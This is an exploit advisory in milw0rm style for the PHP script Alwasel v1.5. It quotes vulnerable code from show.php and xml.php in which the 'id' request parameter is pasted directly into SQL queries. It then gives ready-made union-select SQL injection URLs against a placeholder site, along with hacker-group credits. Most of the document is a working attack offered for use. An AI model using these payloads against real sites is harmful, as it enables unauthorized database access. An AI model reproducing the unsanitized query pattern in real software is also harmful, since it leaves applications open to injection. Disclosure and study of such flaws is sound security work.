------------------Alwasel v1.5 Multiple Remote Vulnerabilities---------------------------- # #### # ### ## ### #### #### ### ## ### #### #### ### # ### #### ###### ## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ### # # ### # # ## ### ### # # # # ### ## # # # ### # #### # # #### # # ###### # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # ## # # ## ## ### ## ## #### ### ### #### ### # # ### #### #### ### # ### # #### ### #---------------------------------------------------------------------------------------------------------------- Script : Alwasel version : 1.5 Language: PHP Site: http://www.abushhab.com Demo :http://alwasel.abushhab.com/1/ Info :http://abushhab.com/alwasel.html Author: SwEET-DeViL #---------------------------------------------------------------------------------------------------------------- )=> show.php ................................................................................................................. if ( $_GET['id'] ) { $qshowcinfo = @mysql_query( "SELECT * FROM cat where id = ".$_GET['id'] ); <==============={ $nshowcinfo = @mysql_num_rows( $qshowcinfo ); //################################################################################################### if ( $_GET['id'] ) { $qshowsinfo = @mysql_query( "SELECT * FROM site where id = ".$_GET['id']." and ok != 0 and ok != 2" ); <==============={ $nshowsinfo = @mysql_num_rows( $qshowsinfo ); ................................................................................................................. #Exploit: http://WWW.Site.Com/alwasel/show.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#-- http://WWW.Site.Com/alwasel/show.php?page=site&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16#-- ----------------------------------------------------------------------------------------------------------------- )=> xml.php ................................................................................................................. if ( $_GET['id'] ) { $qshowcinfo = @mysql_query( "SELECT * FROM cat where id = ".$_GET['id'] ); <==============={ $nshowcinfo = @mysql_num_rows( $qshowcinfo ); ................................................................................................................. #Exploit: http://WWW.Site.Com/alwasel/xml.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#-- ----------------------------------------------------------------------------------------------------------------- #......> /-------------www.arab4services.net-----------------\ |+------------------------------------------------+ | || SwEET-DeViL & viP HaCkEr | | || gamr-14(at)hotmail.com | | |+------------------------------------------------+ | \---------------------------------------------------/ # milw0rm.com [2009-08-07]